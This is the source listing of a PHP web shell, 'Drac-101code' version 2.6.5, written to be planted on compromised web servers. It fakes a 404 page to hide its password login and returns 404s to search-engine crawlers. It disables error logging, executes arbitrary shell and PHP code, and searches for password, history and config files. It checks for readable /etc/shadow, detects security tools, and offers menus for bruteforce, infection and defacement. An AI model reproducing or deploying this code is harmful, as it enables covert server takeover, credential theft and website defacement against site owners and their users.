<?php $auth_pass = "21232f297a57a5a743894a0e4a801fc3"; $color =

1.  
2. <?php
3. $auth_pass = "21232f297a57a5a743894a0e4a801fc3";
4. $color = "#00ff00";
5. $sec = 1;
6. $default_action = 'FilesMan';
7. @define('SELF_PATH', __FILE__);
8.  
9.  
10. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
11. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "facebook","yahoo");
12. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
13. header('HTTP/1.0 404 Not Found');
14. exit;
15. }
16. }
17. @session_start();
18. @error_reporting(0);
19. @ini_set('error_log',NULL);
20. @ini_set('log_errors',0);
21. @ini_set('max_execution_time',0);
22. @set_time_limit(0);
23. @set_magic_quotes_runtime(0);
24. @define('VERSION' , '2.6.5 by Drac-101code');
25. if( get_magic_quotes_gpc() ) {
26. function stripslashes_array($array) {
27. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
28. }
29. $_POST = stripslashes_array($_POST);
30. }
31. function printLogin() {
32. ?>
33. <h1>Not Found</h1>
34. <p>The requested URL was not found on this server.</p>
35. <hr>
36. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
37. <style>
38. input { margin:0;background-color:#fff;border:1px solid #fff; }
39. </style>
40. <center>
41. <form method=post>
42. <input type=password name=pass>
43. </form></center>
44. <?php
45. exit;
46. }
47. if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
48. if( empty( $auth_pass ) ||
49. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
50. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
51. else
52. printLogin();
53.  
54. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
55. $os = 'win';
56. else
57. $os = 'nix';
58. $safe_mode = @ini_get('safe_mode');
59. $disable_functions = @ini_get('disable_functions');
60. $home_cwd = @getcwd();
61. if( isset( $_POST['c'] ) )
62. @chdir($_POST['c']);
63. $cwd = @getcwd();
64. if( $os == 'win') {
65. $home_cwd = str_replace("\\", "/", $home_cwd);
66. $cwd = str_replace("\\", "/", $cwd);
67. }
68. if( $cwd[strlen($cwd)-1] != '/' )
69. $cwd .= '/';
70.  
71. if($os == 'win')
72. $aliases = array(
73. "List Directory" => "dir",
74. "Find index.php in current dir" => "dir /s /w /b index.php",
75. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
76. "Show active connections" => "netstat -an",
77. "Show running services" => "net start",
78. "User accounts" => "net user",
79. "Show computers" => "net view",
80. "ARP Table" => "arp -a",
81. "IP Configuration" => "ipconfig /all"
82. );
83. else
84. $aliases = array(
85. "List dir" => "ls -la",
86. "list file attributes on a Linux second extended file system" => "lsattr -va",
87. "show opened ports" => "netstat -an | grep -i listen",
88. "Find" => "",
89. "find all suid files" => "find / -type f -perm -04000 -ls",
90. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
91. "find all sgid files" => "find / -type f -perm -02000 -ls",
92. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
93. "find config.inc.php files" => "find / -type f -name config.inc.php",
94. "find config* files" => "find / -type f -name \"config*\"",
95. "find config* files in current dir" => "find . -type f -name \"config*\"",
96. "find all writable folders and files" => "find / -perm -2 -ls",
97. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
98. "find all service.pwd files" => "find / -type f -name service.pwd",
99. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
100. "find all .htpasswd files" => "find / -type f -name .htpasswd",
101. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
102. "find all .bash_history files" => "find / -type f -name .bash_history",
103. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
104. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
105. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
106. "Locate" => "",
107. "locate httpd.conf files" => "locate httpd.conf",
108. "locate vhosts.conf files" => "locate vhosts.conf",
109. "locate proftpd.conf files" => "locate proftpd.conf",
110. "locate psybnc.conf files" => "locate psybnc.conf",
111. "locate my.conf files" => "locate my.conf",
112. "locate admin.php files" =>"locate admin.php",
113. "locate cfg.php files" => "locate cfg.php",
114. "locate conf.php files" => "locate conf.php",
115. "locate config.dat files" => "locate config.dat",
116. "locate config.php files" => "locate config.php",
117. "locate config.inc files" => "locate config.inc",
118. "locate config.inc.php" => "locate config.inc.php",
119. "locate config.default.php files" => "locate config.default.php",
120. "locate config* files " => "locate config",
121. "locate .conf files"=>"locate '.conf'",
122. "locate .pwd files" => "locate '.pwd'",
123. "locate .sql files" => "locate '.sql'",
124. "locate .htpasswd files" => "locate '.htpasswd'",
125. "locate .bash_history files" => "locate '.bash_history'",
126. "locate .mysql_history files" => "locate '.mysql_history'",
127. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
128. "locate backup files" => "locate backup",
129. "locate dump files" => "locate dump",
130. "locate priv files" => "locate priv"
131. );
132.  
133. function printHeader() {
134. if(empty($_POST['charset']))
135. $_POST['charset'] = "UTF-8";
136. global $color;
137. ?>
138. <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found<?=VERSION?></title>
139. <style>
140. body {background-color:#000;color:#fff;}
141. body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
142. span,h1,a { color:<?=$color?> !important; }
143. span { font-weight: bolder; }
144. h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
145. div.content { padding: 5px;margin-left:5px;}
146. a { text-decoration:none; }
147. a:hover { background:#ff0000; }
148. .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
149. .bigarea { width:100%;height:250px; }
150. input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
151. form { margin:0px; }
152. #toolsTbl { text-align:center; }
153. .toolsInp { width: 80%; }
154. .main th {text-align:left;}
155. .main tr:hover{background-color:#5e5e5e;}
156. .main td, th{vertical-align:middle;}
157. pre {font-family:Courier,Monospace;}
158. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
159. </style>
160. <script>
161. function set(a,c,p1,p2,p3,p4,charset) {
162. if(a != null)document.mf.a.value=a;
163. if(c != null)document.mf.c.value=c;
164. if(p1 != null)document.mf.p1.value=p1;
165. if(p2 != null)document.mf.p2.value=p2;
166. if(p3 != null)document.mf.p3.value=p3;
167. if(p4 != null)document.mf.p4.value=p4;
168. if(charset != null)document.mf.charset.value=charset;
169. }
170. function g(a,c,p1,p2,p3,charset) {
171. set(a,c,p1,p2,p3,charset);
172. document.mf.submit();
173. }
174. function da2(a,c,p1,p2,p3,p4,charset) {
175. set(a,c,p1,p2,p3,p4,charset);
176. document.mf.submit();
177. }
178. function a(a,c,p1,p2,p3,charset) {
179. set(a,c,p1,p2,p3,charset);
180. var params = "ajax=true";
181. for(i=0;i<document.mf.elements.length;i++)
182. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
183. sr('<?=$_SERVER['REQUEST_URI'];?>', params);
184. }
185. function sr(url, params) {
186. if (window.XMLHttpRequest) {
187. req = new XMLHttpRequest();
188. req.onreadystatechange = processReqChange;
189. req.open("POST", url, true);
190. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
191. req.send(params);
192. }
193. else if (window.ActiveXObject) {
194. req = new ActiveXObject("Microsoft.XMLHTTP");
195. if (req) {
196. req.onreadystatechange = processReqChange;
197. req.open("POST", url, true);
198. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
199. req.send(params);
200. }
201. }
202. }
203. function processReqChange() {
204. if( (req.readyState == 4) )
205. if(req.status == 200) {
206.  
207. //alert(req.responseText);
208. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
209. var arr=reg.exec(req.responseText);
210. eval(arr[2].substr(0, arr[1]));
211. }
212. else alert("Request error!");
213. }
214. </script>
215. <head><body><div style="position:absolute;width:100%;top:0;left:0;">
216. <form method=post name=mf style='display:none;'>
217. <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
218. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
219. <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
220. <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
221. <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
222. <input type=hidden name=p4 value='<?=isset($_POST['p4'])?htmlspecialchars($_POST['p4']):''?>'>
223. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
224. </form>
225. <?php
226. $freeSpace = @diskfreespace($GLOBALS['cwd']);
227. $totalSpace = @disk_total_space($GLOBALS['cwd']);
228. $totalSpace = $totalSpace?$totalSpace:1;
229. $release = @php_uname('r');
230. $kernel = @php_uname('s');
231. $millink='http://www.exploit-db.com/search/?action=search&filter_description=';
232. // fixme
233. $millink2='http://www.1337day.com/search';
234.  
235. if( strpos('Linux', $kernel) !== false )
236. $millink .= urlencode( '' . substr($release,0,6) );
237. else
238. $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
239. if(!function_exists('posix_getegid')) {
240. $user = @get_current_user();
241. $uid = @getmyuid();
242. $gid = @getmygid();
243. $group = "?";
244. } else {
245. $uid = @posix_getpwuid(@posix_geteuid());
246. $gid = @posix_getgrgid(@posix_getegid());
247. $user = $uid['name'];
248. $uid = $uid['uid'];
249. $group = $gid['name'];
250. $gid = $gid['gid'];
251. }
252.  
253. $cwd_links = '';
254. $path = explode("/", $GLOBALS['cwd']);
255. $n=count($path);
256. for($i=0;$i<$n-1;$i++) {
257. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
258. for($j=0;$j<=$i;$j++)
259. $cwd_links .= $path[$j].'/';
260. $cwd_links .= "\")'>".$path[$i]."/</a>";
261. }
262. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
263. $opt_charsets = '';
264. foreach($charsets as $item)
265. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
266. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Infect'=>'Infect','Readable'=>'Readable','Test'=>'Test','CgiShell'=>'CgiShell','Symlink'=>'Symlink','Deface'=>'Deface', 'Domain'=>'Domain','ZHposter'=>'ZHposter');
267.  
268. if(!empty($GLOBALS['auth_pass']))
269. $m['Logout'] = 'Logout';
270. $m['Self remove'] = 'SelfRemove';
271. $menu = '';
272. foreach($m as $k => $v)
273. $menu .= '<th width="'.(int)(1/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
274. $drives = "";
275. if ($GLOBALS['os'] == 'win') {
276. foreach( range('a','z') as $drive )
277. if (is_dir($drive.':\\'))
278. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
279. }
280. echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
281. '<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[exploit-db]</a> <a href="'.$millink2.'" target=_blank>[1337day]</a>
282. Download : <a href="http://www.google.com" target=_blank>[SideKick1]</a>
283. <a href="http://www.google.com" target=_blank>[SideKick2]</a>
284. </nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' ) <span>Usefull Locals:</span> '.rootxpL().' <br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
285. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
286. '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
287. }
288.  
289. function printFooter() {
290. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
291. ?>
292. </div>
293. <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
294. <tr>
295. <td><form onSubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
296. <td><form onSubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
297. </tr>
298. <tr>
299. <td><form onSubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
300. <td><form onSubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
301. </tr>
302. <tr>
303. <td><form onSubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
304. <td><form method='post' ENCTYPE='multipart/form-data'>
305. <input type=hidden name=a value='FilesMAn'>
306. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
307. <input type=hidden name=p1 value='uploadFile'>
308. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
309. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
310. </tr>
311.  
312. </table>
313. </div>
314. </body></html>
315. <?php
316. }
317. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
318. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
319. function ex($in) {
320. $out = '';
321. if(function_exists('exec')) {
322. @exec($in,$out);
323. $out = @join("\n",$out);
324. }elseif(function_exists('passthru')) {
325. ob_start();
326. @passthru($in);
327. $out = ob_get_clean();
328. }elseif(function_exists('system')) {
329. ob_start();
330. @system($in);
331. $out = ob_get_clean();
332. }elseif(function_exists('shell_exec')) {
333. $out = shell_exec($in);
334. }elseif(is_resource($f = @popen($in,"r"))) {
335. $out = "";
336. while(!@feof($f))
337. $out .= fread($f,1024);
338. pclose($f);
339. }
340. return $out;
341. }
342. function viewSize($s) {
343. if($s >= 1073741824)
344. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
345. elseif($s >= 1048576)
346. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
347. elseif($s >= 1024)
348. return sprintf('%1.2f', $s / 1024 ) . ' KB';
349. else
350. return $s . ' B';
351. }
352.  
353. function perms($p) {
354. if (($p & 0xC000) == 0xC000)$i = 's';
355. elseif (($p & 0xA000) == 0xA000)$i = 'l';
356. elseif (($p & 0x8000) == 0x8000)$i = '-';
357. elseif (($p & 0x6000) == 0x6000)$i = 'b';
358. elseif (($p & 0x4000) == 0x4000)$i = 'd';
359. elseif (($p & 0x2000) == 0x2000)$i = 'c';
360. elseif (($p & 0x1000) == 0x1000)$i = 'p';
361. else $i = 'u';
362. $i .= (($p & 0x0100) ? 'r' : '-');
363. $i .= (($p & 0x0080) ? 'w' : '-');
364. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
365. $i .= (($p & 0x0020) ? 'r' : '-');
366. $i .= (($p & 0x0010) ? 'w' : '-');
367. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
368. $i .= (($p & 0x0004) ? 'r' : '-');
369. $i .= (($p & 0x0002) ? 'w' : '-');
370. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
371. return $i;
372. }
373. function viewPermsColor($f) {
374. if (!@is_readable($f))
375. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
376. elseif (!@is_writable($f))
377. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
378. else
379. return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
380. }
381. if(!function_exists("scandir")) {
382. function scandir($dir) {
383. $dh = opendir($dir);
384. while (false !== ($filename = readdir($dh))) {
385. $files[] = $filename;
386. }
387. return $files;
388. }
389. }
390. function which($p) {
391. $path = ex('which '.$p);
392. if(!empty($path))
393. return $path;
394. return false;
395. }
396. function actionSecInfo() {
397. printHeader();
398. echo '<h1>Server security information</h1><div class=content>';
399. function showSecParam($n, $v) {
400. $v = trim($v);
401. if($v) {
402. echo '<span>'.$n.': </span>';
403. if(strpos($v, "\n") === false)
404. echo $v.'<br>';
405. else
406. echo '<pre class=ml1>'.$v.'</pre>';
407. }
408. }
409.  
410. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
411. if(function_exists('apache_get_modules'))
412. showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
413. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
414. showSecParam('Open base dir', @ini_get('open_basedir'));
415. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
416. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
417. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
418. $temp=array();
419. if(function_exists('mysql_get_client_info'))
420. $temp[] = "MySql (".mysql_get_client_info().")";
421. if(function_exists('mssql_connect'))
422. $temp[] = "MSSQL";
423. if(function_exists('pg_connect'))
424. $temp[] = "PostgreSQL";
425. if(function_exists('oci_connect'))
426. $temp[] = "Oracle";
427. showSecParam('Supported databases', implode(', ', $temp));
428. echo '<br>';
429.  
430. if( $GLOBALS['os'] == 'nix' ) {
431. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
432. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
433. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
434. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
435. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
436. showSecParam('OS version', @file_get_contents('/proc/version'));
437. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
438. if(!$GLOBALS['safe_mode']) {
439. echo '<br>';
440. $temp=array();
441. foreach ($userful as $item)
442. if(which($item)){$temp[]=$item;}
443. showSecParam('Userful', implode(', ',$temp));
444. $temp=array();
445. foreach ($danger as $item)
446. if(which($item)){$temp[]=$item;}
447. showSecParam('Danger', implode(', ',$temp));
448. $temp=array();
449. foreach ($downloaders as $item)
450. if(which($item)){$temp[]=$item;}
451. showSecParam('Downloaders', implode(', ',$temp));
452. echo '<br/>';
453. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
454. showSecParam('HDD space', ex('df -h'));
455. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
456. }
457. } else {
458. showSecParam('OS Version',ex('ver'));
459. showSecParam('Account Settings',ex('net accounts'));
460. showSecParam('User Accounts',ex('net user'));
461. }
462. echo '</div>';
463. printFooter();
464. }
465.  
466. function actionPhp() {
467. if( isset($_POST['ajax']) ) {
468. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
469. ob_start();
470. eval($_POST['p1']);
471. $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
472. echo strlen($temp), "\n", $temp;
473. exit;
474. }
475. printHeader();
476. if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
477. echo '<h1>PHP info</h1><div class=content>';
478. ob_start();
479. phpinfo();
480. $tmp = ob_get_clean();
481. $tmp = preg_replace('!body {.*}!msiU','',$tmp);
482. $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
483. $tmp = preg_replace('!h1!msiU','h2',$tmp);
484. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
485. $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
486. echo $tmp;
487. echo '</div><br>';
488. }
489. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
490. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
491. echo '<h1>Execution PHP-code</h1> example : echo file_get_contents(`/etc/passwd`); <div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
492. echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
493. if(!empty($_POST['p1'])) {
494. ob_start();
495. eval($_POST['p1']);
496. echo htmlspecialchars(ob_get_clean());
497. }
498. echo '</pre></div>';
499. printFooter();
500. }
501.  
502. function actionFilesMan() {
503. printHeader();
504. echo '<h1>File manager</h1><div class=content>';
505. if(isset($_POST['p1'])) {
506. switch($_POST['p1']) {
507. case 'uploadFile':
508. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
509. echo "Can't upload file!";
510. break;
511. break;
512. case 'mkdir':
513. if(!@mkdir($_POST['p2']))
514. echo "Can't create new dir";
515. break;
516. case 'delete':
517. function deleteDir($path) {
518. $path = (substr($path,-1)=='/') ? $path:$path.'/';
519. $dh = opendir($path);
520. while ( ($item = readdir($dh) ) !== false) {
521. $item = $path.$item;
522. if ( (basename($item) == "..") || (basename($item) == ".") )
523. continue;
524. $type = filetype($item);
525. if ($type == "dir")
526. deleteDir($item);
527. else
528. @unlink($item);
529. }
530. closedir($dh);
531. rmdir($path);
532. }
533. if(is_array(@$_POST['f']))
534. foreach($_POST['f'] as $f) {
535. $f = urldecode($f);
536. if(is_dir($f))
537. deleteDir($f);
538. else
539. @unlink($f);
540. }
541. break;
542. case 'paste':
543. if($_SESSION['act'] == 'copy') {
544. function copy_paste($c,$s,$d){
545. if(is_dir($c.$s)){
546. mkdir($d.$s);
547. $h = opendir($c.$s);
548. while (($f = readdir($h)) !== false)
549. if (($f != ".") and ($f != "..")) {
550. copy_paste($c.$s.'/',$f, $d.$s.'/');
551. }
552. } elseif(is_file($c.$s)) {
553. @copy($c.$s, $d.$s);
554. }
555. }
556. foreach($_SESSION['f'] as $f)
557. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
558. } elseif($_SESSION['act'] == 'move') {
559. function move_paste($c,$s,$d){
560. if(is_dir($c.$s)){
561. mkdir($d.$s);
562. $h = opendir($c.$s);
563. while (($f = readdir($h)) !== false)
564. if (($f != ".") and ($f != "..")) {
565. copy_paste($c.$s.'/',$f, $d.$s.'/');
566. }
567. } elseif(is_file($c.$s)) {
568. @copy($c.$s, $d.$s);
569. }
570. }
571. foreach($_SESSION['f'] as $f)
572. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
573. }
574. unset($_SESSION['f']);
575. break;
576. default:
577. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
578. $_SESSION['act'] = @$_POST['p1'];
579. $_SESSION['f'] = @$_POST['f'];
580. foreach($_SESSION['f'] as $k => $f)
581. $_SESSION['f'][$k] = urldecode($f);
582. $_SESSION['cwd'] = @$_POST['c'];
583. }
584. break;
585. }
586. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
587. }
588. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
589. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
590. global $sort;
591. $sort = array('name', 1);
592. if(!empty($_POST['p1'])) {
593. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
594. $sort = array($match[1], (int)$match[2]);
595. }
596. ?>
597. <script>
598. function sa() {
599. for(i=0;i<document.files.elements.length;i++)
600. if(document.files.elements[i].type == 'checkbox')
601. document.files.elements[i].checked = document.files.elements[0].checked;
602. }
603. </script>
604. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
605. <form name=files method=post>
606. <?php
607. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
608. $dirs = $files = $links = array();
609. $n = count($dirContent);
610. for($i=0;$i<$n;$i++) {
611. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
612. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
613. $tmp = array('name' => $dirContent[$i],
614. 'path' => $GLOBALS['cwd'].$dirContent[$i],
615. 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
616. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
617. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
618. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
619. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
620. );
621. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
622. $files[] = array_merge($tmp, array('type' => 'file'));
623. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
624. $links[] = array_merge($tmp, array('type' => 'link'));
625. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
626. $dirs[] = array_merge($tmp, array('type' => 'dir'));
627. }
628. $GLOBALS['sort'] = $sort;
629. function cmp($a, $b) {
630. if($GLOBALS['sort'][0] != 'size')
631. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
632. else
633. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
634. }
635. usort($files, "cmp");
636. usort($dirs, "cmp");
637. usort($links, "cmp");
638. $files = array_merge($dirs, $links, $files);
639. $l = 0;
640. foreach($files as $f) {
641. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
